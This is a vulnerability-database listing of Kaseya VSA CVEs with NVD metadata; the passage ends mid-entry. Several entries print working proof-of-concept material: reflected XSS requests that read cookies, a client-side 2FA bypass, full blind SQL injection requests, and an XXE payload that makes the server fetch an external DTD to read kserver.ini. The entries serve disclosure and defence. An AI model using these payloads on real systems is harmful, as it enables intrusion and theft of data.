
21 vulnerabilities found for vsa by kaseya

FKIE_CVE-2021-30119

Vulnerability from fkie_nvd - Published: 2021-07-09 14:15 - Updated: 2024-11-21 06:03
Summary
Authenticated reflective XSS in HelpDeskTab/rcResults.asp. The parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack. Example request: `https://x.x.x.x/HelpDeskTab/rcResults.asp?result=<script>alert(document.cookie)</script>` The same is true for the parameter FileName of /done.asp. Example request: `https://x.x.x.x/done.asp?FileName=";</script><script>alert(1);a="&PathData=&originalName=shell.aspx&FileSize=4388&TimeElapsed=00:00:00.078`
Impacted products
Vendor Product Version
kaseya vsa *

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:kaseya:vsa:*:*:*:*:-:*:*:*",
              "matchCriteriaId": "2CF9574C-46BA-4D17-A59E-8D1E2D3966B9",
              "versionEndExcluding": "9.5.7",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Authenticated reflective XSS in HelpDeskTab/rcResults.asp. The parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack. Example request: `https://x.x.x.x/HelpDeskTab/rcResults.asp?result=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e` The same is true for the parameter FileName of /done.asp. Example request: `https://x.x.x.x/done.asp?FileName=\";\u003c/script\u003e\u003cscript\u003ealert(1);a=\"\u0026PathData=\u0026originalName=shell.aspx\u0026FileSize=4388\u0026TimeElapsed=00:00:00.078`"
    },
    {
      "lang": "es",
      "value": "XSS reflexivo autenticado en HelpDeskTab/rcResults.asp El par\u00e1metro result de /HelpDeskTab/rcResults.asp se devuelve de forma insegura en la p\u00e1gina web solicitada y puede utilizarse para realizar un ataque de Cross Site Scripting Ejemplo de solicitud: `https://x.x.x.x/HelpDeskTab/rcResults. asp?result=` Lo mismo ocurre con el par\u00e1metro FileName de /done.asp Petici\u00f3n de ejemplo: `https://x.x.x.x/done.asp?FileName=\";"
    }
  ],
  "id": "CVE-2021-30119",
  "lastModified": "2024-11-21T06:03:20.583",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "LOW",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "NONE",
          "baseScore": 3.5,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 6.8,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.4,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.3,
        "impactScore": 2.7,
        "source": "cve@mitre.org",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.4,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.3,
        "impactScore": 2.7,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-07-09T14:15:07.873",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/CVE-2021-30119"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/DIVD-2021-00011"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/CVE-2021-30119"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/DIVD-2021-00011"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

FKIE_CVE-2021-30120

Vulnerability from fkie_nvd - Published: 2021-07-09 14:15 - Updated: 2024-11-21 06:03
Summary
Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement. The need to use 2FA for authentication is enforced client-side instead of server-side and can be bypassed using a local proxy, thus rendering 2FA useless. Detailed description --- During the login process, after the user authenticates with username and password, the server sends a response to the client with the booleans MFARequired and MFAEnroled. If the attacker has obtained a password of a user and used an intercepting proxy (e.g. Burp Suite) to change the value of MFARequired from True to False, there is no prompt for the second factor, but the user is still logged in.
Impacted products
Vendor Product Version
kaseya vsa *

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:kaseya:vsa:*:*:*:*:-:*:*:*",
              "matchCriteriaId": "13B1AE73-6472-40B0-914E-4EB9A4C7270D",
              "versionEndIncluding": "9.5.6",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement. The need to use 2FA for authentication is enforced client-side instead of server-side and can be bypassed using a local proxy, thus rendering 2FA useless. Detailed description --- During the login process, after the user authenticates with username and password, the server sends a response to the client with the booleans MFARequired and MFAEnroled. If the attacker has obtained a password of a user and used an intercepting proxy (e.g. Burp Suite) to change the value of MFARequired from True to False, there is no prompt for the second factor, but the user is still logged in."
    },
    {
      "lang": "es",
      "value": "Kaseya VSA antes de la versi\u00f3n 9.5.7 permite a los atacantes eludir el requisito de 2FA. La necesidad de usar 2FA para la autenticaci\u00f3n en la aplicaci\u00f3n del lado del cliente en lugar del lado del servidor y puede ser evadida usando un proxy local. De este modo, se hace in\u00fatil la 2FA. Descripci\u00f3n detallada --- Durante el proceso de inicio de sesi\u00f3n, despu\u00e9s de que el usuario se autentique con nombre de usuario y contrase\u00f1a, el servidor env\u00eda una respuesta al cliente con los booleanos MFARequired y MFAEnroled. Si el atacante ha obtenido la contrase\u00f1a de un usuario y ha utilizado un proxy de intercepci\u00f3n (por ejemplo, Burp Suite) para cambiar el valor de MFARequered de True a False, no se solicita el segundo factor, pero el usuario sigue conectado"
    }
  ],
  "id": "CVE-2021-30120",
  "lastModified": "2024-11-21T06:03:20.730",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.9,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.1,
        "impactScore": 6.0,
        "source": "cve@mitre.org",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-07-09T14:15:07.903",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Permissions Required",
        "Third Party Advisory"
      ],
      "url": "https://csrit.divd.nl/CVE-2021-30120"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Permissions Required",
        "Third Party Advisory"
      ],
      "url": "https://csrit.divd.nl/DIVD-2021-00011"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Permissions Required",
        "Third Party Advisory"
      ],
      "url": "https://csrit.divd.nl/CVE-2021-30120"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Permissions Required",
        "Third Party Advisory"
      ],
      "url": "https://csrit.divd.nl/DIVD-2021-00011"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-669"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

FKIE_CVE-2021-30117

Vulnerability from fkie_nvd - Published: 2021-07-09 14:15 - Updated: 2024-11-21 06:03
Summary
The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description --- Given the following request: ``` GET /InstallTab/exportFldr.asp?fldrId=1’ HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 <!DOCTYPE html> <HTML> <HEAD> <title>Whoops.</title> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <link id="favIcon" rel="shortcut icon" href="/themes/default/images/favicon.ico?307447361"></link> ----SNIP---- ``` However when fldrId is set to ‘(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))’ the request is allowed. 
Request: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Response: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 <html> <head> <title>Export Folder</title> <style> ------ SNIP ----- ```
Impacted products
Vendor Product Version
kaseya vsa *

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:kaseya:vsa:*:*:*:*:-:*:*:*",
              "matchCriteriaId": "3A890109-5AD9-4684-A46D-A80D6A5F1834",
              "versionEndExcluding": "9.5.6",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description --- Given the following request: ``` GET /InstallTab/exportFldr.asp?fldrId=1\u2019 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3\u0026roleId=2; webWindowId=59091519; ``` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 \u003c!DOCTYPE html\u003e \u003cHTML\u003e \u003cHEAD\u003e \u003ctitle\u003eWhoops.\u003c/title\u003e \u003cmeta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\" /\u003e \u003clink id=\"favIcon\" rel=\"shortcut icon\" href=\"/themes/default/images/favicon.ico?307447361\"\u003e\u003c/link\u003e ----SNIP---- ``` However when fldrId is set to \u2018(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))\u2019 the request is allowed. 
Request: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3\u0026roleId=2; webWindowId=59091519; ``` Response: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 \u003chtml\u003e \u003chead\u003e \u003ctitle\u003eExport Folder\u003c/title\u003e \u003cstyle\u003e ------ SNIP ----- ```"
    },
    {
      "lang": "es",
      "value": "La llamada a la API /InstallTab/exportFldr.asp es vulnerable a una inyecci\u00f3n SQL ciega semiautenticada basada en booleanos en el par\u00e1metro fldrId. Descripci\u00f3n detallada --- Dada la siguiente petici\u00f3n: ``` GET /InstallTab/exportFldr.asp?fldrId=1\u0027 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3\u0026amp;roleId=2; webWindowId=59091519; ``` Donde el valor de la cookie sessionId se ha obtenido mediante CVE-2021-30116. El resultado deber\u00eda ser un fallo. Respuesta: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881    Whoops.    ----SNIP---- ``` Sin embargo, cuando fldrId est\u00e1 configurado como \u0027(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))\u0027 la petici\u00f3n est\u00e1 permitida. 
Solicitud: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29END%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3\u0026amp;roleId=2; webWindowId=59091519; ``` Respuesta: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960   Carpeta de exportaci\u00f3n "
    }
  ],
  "id": "CVE-2021-30117",
  "lastModified": "2024-11-21T06:03:20.263",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "cve@mitre.org",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-07-09T14:15:07.810",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

FKIE_CVE-2021-30201

Vulnerability from fkie_nvd - Published: 2021-07-09 14:15 - Updated: 2024-11-21 06:03
Summary
The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:kas="KaseyaWS"> <soapenv:Header/> <soapenv:Body> <kas:PrimitiveResetPassword> <!--type: string--> <kas:XmlRequest><![CDATA[<!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob.dtd"><data>&send;</data>]]> </kas:XmlRequest> </kas:PrimitiveResetPassword> </soapenv:Body> </soapenv:Envelope> ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` <!ENTITY % file SYSTEM "file://c:\\kaseya\\kserver\\kserver.ini"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\kaseya\\kserver\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request. ---&gt; There is an error in XML document (24, -1000).\r\n\r\nSystem.Xml.XmlException: Fragment identifier '######################################################################## # This is the configuration file for the KServer. 
# Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## <snip> ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network.
Impacted products
Vendor Product Version
kaseya vsa *

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:kaseya:vsa:*:*:*:*:-:*:*:*",
              "matchCriteriaId": "3A890109-5AD9-4684-A46D-A80D6A5F1834",
              "versionEndExcluding": "9.5.6",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 \u003csoapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:kas=\"KaseyaWS\"\u003e \u003csoapenv:Header/\u003e \u003csoapenv:Body\u003e \u003ckas:PrimitiveResetPassword\u003e \u003c!--type: string--\u003e \u003ckas:XmlRequest\u003e\u003c![CDATA[\u003c!DOCTYPE data SYSTEM \"http://192.168.1.170:8080/oob.dtd\"\u003e\u003cdata\u003e\u0026send;\u003c/data\u003e]]\u003e \u003c/kas:XmlRequest\u003e \u003c/kas:PrimitiveResetPassword\u003e \u003c/soapenv:Body\u003e \u003c/soapenv:Envelope\u003e ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` \u003c!ENTITY % file SYSTEM \"file://c:\\\\kaseya\\\\kserver\\\\kserver.ini\"\u003e \u003c!ENTITY % eval \"\u003c!ENTITY \u0026#x25; error SYSTEM \u0027file:///nonexistent/%file;\u0027\u003e\"\u003e %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\\\kaseya\\\\kserver\\\\kserver.ini and returns the content in the server response like below. 
Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 \u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\u003csoap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\u003e\u003csoap:Body\u003e\u003csoap:Fault\u003e\u003cfaultcode\u003esoap:Server\u003c/faultcode\u003e\u003cfaultstring\u003eServer was unable to process request. ---\u0026gt; There is an error in XML document (24, -1000).\\r\\n\\r\\nSystem.Xml.XmlException: Fragment identifier \u0027######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## \u003csnip\u003e ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network."
    },
    {
      "lang": "es",
      "value": "La API /vsaWS/KaseyaWS.asmx puede utilizarse para enviar XML al sistema. Cuando este XML es procesado (externo) las entidades son procesadas y obtenidas de forma insegura por el sistema y devueltas al atacante. Descripci\u00f3n detallada Dada la siguiente petici\u00f3n: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406      \u0026lt;!DOCTYPE data SYSTEM \"http://192.168.1.170:8080/oob. dtd\"\u0026gt;\u0026lt;data\u0026gt;\u0026amp;send;\u0026lt;/data\u0026gt;     ``` Y el siguiente archivo XML alojado en http://192.168.1.170/oob.dtd: ```  \"\u0026gt; %eval; %error; ``` El servidor obtendr\u00e1 este archivo XML y lo procesar\u00e1, leer\u00e1 el archivo c:\\kaseya\\kserver\\kserver.ini y devolver\u00e1 el contenido en la respuesta del servidor como se indica a continuaci\u00f3n. Respuesta: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 soap:ServerEl servidor no pudo procesar la solicitud. ---Hay un error en el documento XML (24, -1000): Identificador de fragmento \u0027######################################################################## # Este es el archivo de configuraci\u00f3n para el KServer. # Col\u00f3quelo en el mismo directorio que el ejecutable del KServer # Una l\u00ednea en blanco o una nueva cabecera de secci\u00f3n v\u00e1lida [] termina cada secci\u00f3n. # Las l\u00edneas de comentario comienzan con ; o # ########################################################################  ``` Problemas de seguridad descubiertos --- * La API resuelve de forma insegura entidades XML externas * La API tiene una 